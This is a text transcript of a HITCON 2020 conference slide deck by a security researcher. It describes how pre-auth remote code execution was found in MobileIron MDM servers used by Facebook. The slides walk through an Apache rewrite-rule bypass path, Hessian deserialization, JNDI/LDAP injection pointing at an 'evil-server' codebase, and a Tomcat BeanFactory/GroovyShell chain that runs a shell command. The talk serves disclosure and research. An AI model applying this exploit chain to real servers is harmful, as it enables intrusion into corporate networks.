how i hacked facebook again! - hitcon 2020 i hacked facebook...how i hacked facebook again! by...
TRANSCRIPT
![Page 1: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/1.jpg)
How I Hacked facebook
Again! by Orange Tsai
![Page 2: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/2.jpg)
Orange Tsai
• Principal security researcher at DEVCORE
• Captain of HITCON CTF team
• 0day researcher, focusing on
Web/Application security
orange_8361
![Page 3: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/3.jpg)
![Page 4: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/4.jpg)
![Page 5: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/5.jpg)
![Page 6: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/6.jpg)
![Page 7: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/7.jpg)
Infiltrating Corporate Intranet Like NSAPre-auth RCE on Leading SSL VPNs
Orange Tsai (@orange_8361)
Meh Chang (@mehqq_)
USA 2019
![Page 8: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/8.jpg)
Disclaimer所有漏洞皆經過合·法·流·程 回報並且修·復·完·成
![Page 9: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/9.jpg)
MDM(Mobile Device Management)
https://www.manageengine.com/products/desktop-central/images/MDM_features.png
![Page 10: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/10.jpg)
![Page 11: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/11.jpg)
![Page 12: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/12.jpg)
![Page 13: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/13.jpg)
常見 MDM 解決方案
VMWare AirWatch
MobileIron
Microsoft Intune
Trend Micro Mobile Security IBM MaaS 360
Jamf Pro
Citrix XenMobi
Apple DEP/Profile ManagerSophos Mobile Control
ManageEngine
![Page 14: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/14.jpg)
常見 MDM 解決方案
VMWare AirWatch
MobileIron
Microsoft Intune
Trend Micro Mobile Security IBM MaaS 360
Jamf Pro
Citrix XenMobi
Apple DEP/Profile ManagerSophos Mobile Control
ManageEngine
![Page 15: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/15.jpg)
Why MobileIron?
1. 根據官網,至少 20,000+ 企業使選擇
2. 至少 15% 的財富世界 500 大公司選擇、且暴露在外網
3. 台灣企業使用比例最高的 MDM
4. Facebook 有在使用!
![Page 16: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/16.jpg)
如何開始?
![Page 17: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/17.jpg)
![Page 18: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/18.jpg)
![Page 19: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/19.jpg)
怎麼跑起來?痛苦。
![Page 20: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/20.jpg)
![Page 21: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/21.jpg)
![Page 22: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/22.jpg)
架構
Tomcat
MI Server
443/8443 Apache
9997 MI Protocol
Reverse Proxy
TLS Proxy
![Page 23: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/23.jpg)
找洞!1. 該防的都有防
2. 沒有很好打
3. 但也不算很難打
![Page 24: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/24.jpg)
![Page 25: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/25.jpg)
Vulnerability
Tomcat
MI Server
Reverse Proxy
TLS Proxy
443 Apache
9997 MI Protocol
8443 Apache
![Page 26: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/26.jpg)
Tomcat
MI Server
Reverse Proxy
TLS Proxy
443 Apache
9997 MI Protocol
8443 Apache
Web Service speaks Hessian!
![Page 27: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/27.jpg)
Touch through Manage Interface
Tomcat
MI Server
Reverse Proxy
TLS Proxy
443 Apache
9997 MI Protocol
8443 Apache
![Page 28: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/28.jpg)
Tomcat
MI Server
Reverse Proxy
TLS Proxy
443 Apache
9997 MI Protocol
8443 Apache
Touch through User Interface…???
❌
![Page 29: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/29.jpg)
Rewrite Rules :(RewriteRule ^/mifs/services/(.*)$ … [R=307,L]
RewriteRule ^/mifs/services - [F]
![Page 30: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/30.jpg)
![Page 31: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/31.jpg)
![Page 32: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/32.jpg)
![Page 33: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/33.jpg)
RewriteRule ^/mifs/services/(.*)$ … [R=307,L]
RewriteRule ^/mifs/services - [F]
/mifs/services/fooService
![Page 34: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/34.jpg)
RewriteRule ^/mifs/services/(.*)$ … [R=307,L]
RewriteRule ^/mifs/services - [F]
/mifs/.;/services/fooService
![Page 35: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/35.jpg)
![Page 36: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/36.jpg)
Hessian Deserialization
![Page 37: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/37.jpg)
Hessian Deserialization
• Java Unmarshaller Security
• A paper written by @mbechler in May 2017
• Known gadgets on Hessian Deserialization:Gadget Name Effect
Spring-AOP JNDI InjectionXBean JNDI InjectionResin JNDI InjectionROME RCE
![Page 38: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/38.jpg)
What is JNDI Injection?Java 提供的 API 介面, 方便開發者 動·態·存·取 物件
jdbc:mysql://localhost:3306/database
![Page 39: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/39.jpg)
Why JNDI Injection?
![Page 40: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/40.jpg)
CVE-2015-2590Pawn Storm (APT28, Fancy Bear)
![Page 41: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/41.jpg)
![Page 42: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/42.jpg)
以前的駭客 現在的駭客
![Page 43: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/43.jpg)
JNDI/LDAP Injection
1. Hessian Deserialization triggers:• A connection to Evil LDAP Server
2. Evil LDAP server replies:• A Naming Reference with Factory and
URLCodeBase=http://evil-server/
3. The class loader:• Can’t find the Factory Class
• Fetch Class through our URLCodeBase
4. Return Evil Java Class
5. Boom! RCE!
Payload
Hacker MobileIron Evil Server
1
5
3
2
LDAP Connection
JNDI Reference
HTTP Connection
Evil Class
4
![Page 44: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/44.jpg)
![Page 45: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/45.jpg)
Java mitigated the JNDI/LDAPin Oct 2018 (CVE-2018-3149)
![Page 46: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/46.jpg)
JNDI/LDAP Injection
1. Hessian Deserialization triggers:• A connection to Evil LDAP Server
2. Evil LDAP server replies:• A Naming Reference with Factory and
URLCodeBase=http://evil-server/
3. The class loader:• Can’t find the Factory Class
• Fetch Class through our URLCodeBase
4. Return Evil Java Class
5. Boom! RCE!
Hacker MobileIron Evil Server
1
5
3
2
4
Payload
LDAP Connection
JNDI Reference
HTTP Connection
Evil Class
![Page 47: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/47.jpg)
JNDI/LDAP Injection after Oct 2018
1. Hessian Deserialization triggers:• A connection to Evil LDAP Server
2. Evil LDAP server replies:• A Naming Reference with Factory and
URLCodeBase=http://evil-server/
3. The class loader:• Can’t find the Factory Class
• Fetch Class through our URLCodeBase
4. Return Evil Java Class
5. Boom! RCE!
Hacker MobileIron Evil Server
1
5
3
2
4
Payload
LDAP Connection
JNDI Reference
HTTP Connection
Evil Class
![Page 48: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/48.jpg)
The bypass!
![Page 49: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/49.jpg)
What's the next?
1. Hessian Deserialization triggers:• A connection to Evil LDAP Server
2. Evil LDAP server replies:• A Naming Reference with Factory and
URLCodeBase=http://evil-server/
3. The class loader:• Can’t find the Factory Class
• Fetch Class through our URLCodeBase
4. Return Evil Java Class
5. Boom! RCE!
Hacker MobileIron Evil Server
1
5
3
2
4
Payload
LDAP Connection
JNDI Reference
HTTP Connection
Evil Class
![Page 50: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/50.jpg)
What's the next?
1. Hessian Deserialization triggers:• A LDAP connection to Evil LDAP Server
2. Evil LDAP server replies:• A Naming Reference with Factory and
URLCodeBase=http://evil-server/
3. The class loader:• Can’t find the Factory Class
• Fetch Class through our URLCodeBase
4. Return Evil Java Class
5. Boom! RCE!
Hacker MobileIron Evil Server
1
5
3
2
4
Payload
LDAP Connection
JNDI Reference
HTTP Connection
Evil Class
Reference to Local is still available!
![Page 51: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/51.jpg)
Leverage the Local Factory
• org.apache.naming.factory.BeanFactory (Tomcat 6-8)
• If there is a forceString in reference, then:
• Parse the forceString as key-value pairs
• Invoke the value as a setter to set the specified field, for example:
ResourceRef ref = new ResourceRef(
"tw.orange.User", null, "", "", true,
"org.apache.naming.factory.BeanFactory", null);
ref.add(new StringRefAddr("forceString", "name=setName"));
ref.add(new StringRefAddr("name", "orange"));
![Page 52: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/52.jpg)
Leverage the Local Factory
• org.apache.naming.factory.BeanFactory (Tomcat 6-8)
• If there is a forceString in reference, then:
• Parse the forceString as key-value pairs
• Invoke the value as a setter to set the specified field, for example:
ResourceRef ref = new ResourceRef(
"tw.orange.User", null, "", "", true,
"org.apache.naming.factory.BeanFactory", null);
ref.add(new StringRefAddr("forceString", "name=setName"));
ref.add(new StringRefAddr("name", "orange"));
![Page 53: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/53.jpg)
Leverage the Local Factory
• org.apache.naming.factory.BeanFactory (Tomcat 6-8)
• If there is a forceString in reference, then do:
• Parse the forceString as key-value pairs
• Invoke the value as a setter to set the specified field, for example:
ResourceRef ref = new ResourceRef(
"tw.orange.User", null, "", "", true,
"org.apache.naming.factory.BeanFactory", null);
ref.add(new StringRefAddr("forceString", "name=setUsername"));
ref.add(new StringRefAddr("name", "orange"));
tw.orange.User().setName("orange")
![Page 54: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/54.jpg)
![Page 55: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/55.jpg)
Method Invoke
javax.el.ELProcessor().eval("evil…")
• Tomcat 8.5+ only, our remote version is 7.0.92
groovy.lang.GroovyClassLoader().parseClass("…")
• Make Meta Programming great again!
• Groovy 2.0+ only, our remote version is 1.5.6
![Page 56: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/56.jpg)
groovy.lang.GroovyShell().evaluate("…")
https://github.com/welk1n/JNDI-Injection-Bypass/pull/1
New Groovy chain! Work on all versions
![Page 57: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/57.jpg)
Bypass with Local Reference
1. Hessian Deserialization triggers:• A connection to Evil LDAP Server
2. Evil LDAP server replies:• ??????
Hacker MobileIron Evil Server
1
2
Payload
LDAP Connection
??????
![Page 58: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/58.jpg)
Bypass with Local Reference
1. Hessian Deserialization triggers:• A connection to Evil LDAP Server
2. Evil LDAP server replies:• Local Factory
org.apache.naming.factory.BeanFactory
Hacker MobileIron Evil Server
1
2
Payload
LDAP Connection
Local Factory
![Page 59: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/59.jpg)
Bypass with Local Reference
1. Hessian Deserialization triggers:• A connection to Evil LDAP Server
2. Evil LDAP server replies:• Local Factory
org.apache.naming.factory.BeanFactory
• Local Object Reference
Groovy.shell.GroovyShell with properties:• forceString is foo=evaluate
• foo is “uname -a”.execute()
Hacker MobileIron Evil Server
1
2
Payload
LDAP Connection
Local Factory
Object Reference
![Page 60: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/60.jpg)
Bypass with Local Reference
1. Hessian Deserialization triggers:• A connection to Evil LDAP Server
2. Evil LDAP server replies:• Local Factory
org.apache.naming.factory.BeanFactory
• Local Object Reference
Groovy.shell.GroovyShell with properties:• forceString is foo=evaluate
• foo is “uname -a”.execute()
3. Factory loads and populates Object
4. Boom! RCE!
Hacker MobileIron Evil Server
1
2
Payload
LDAP Connection
Local Factory
3
4
Object Reference
![Page 61: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/61.jpg)
![Page 62: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/62.jpg)
![Page 63: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/63.jpg)
Bypass with Local Reference
1. Hessian Deserialization triggers:• A connection to Evil LDAP Server
2. Evil LDAP server replies:• Local Factory
org.apache.naming.factory.BeanFactory
• Local Object Reference
Groovy.shell.GroovyShell with properties:• forceString is foo=evaluate
• foo is “uname -a”.execute()
3. Factory loads and populates Object
4. Boom! RCE!
Hacker MobileIron Evil Server
1
2
Payload
LDAP Connection
Local Factory
3
4
Object Reference
❌
![Page 64: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/64.jpg)
Bypass with Local Reference
1. Hessian Deserialization triggers:• A connection to Evil LDAP Server
2. Evil LDAP server replies:• Local Factory
org.apache.naming.factory.BeanFactory
• Local Object Reference
Groovy.shell.GroovyShell with properties:• forceString is foo=evaluate
• foo is “uname -a”.execute()
3. Factory loads and populates Object
4. Boom! RCE!
Hacker MobileIron Evil Server
1
2
Payload
LDAP Connection
Local Factory
3
4
Object Reference
❌
![Page 65: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/65.jpg)
Bypass with Local Reference
1. Hessian Deserialization triggers:• A LDAP connection to Evil RMI Server
2. Evil LDAP server replies:• Local Factory
org.apache.naming.factory.BeanFactory
• Local Object Reference
Groovy.shell.GroovyShell with properties:• forceString is foo=evaluate
• foo is “uname -a”.execute()
3. Factory loads and populate Object
4. Boom! RCE!
Hacker MobileIron Evil Server
1
2
Payload
RMI Connection
Local Factory
3
4
Object Reference
❌
![Page 66: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/66.jpg)
重·讀·論·文。
![Page 67: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/67.jpg)
為什麼補這句話?
![Page 68: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/68.jpg)
Git Blame
![Page 69: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/69.jpg)
Git Blame
![Page 70: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/70.jpg)
Exploit with JNDI Bypass
1. Hessian Deserialization triggers:• A connection to Evil LDAP Server
2. Evil LDAP server replies:• Local Factory
org.apache.naming.factory.BeanFactory
• Local Object Reference
Groovy.shell.GroovyShell with properties:• forceString is foo=evaluate
• foo is “uname -a”.execute()
3. Factory loads and populate Object
4. Boom! RCE!
Hacker MobileIron Evil Server
1
2
Payload
LDAP Connection
Local Factory
3
4
Object Reference
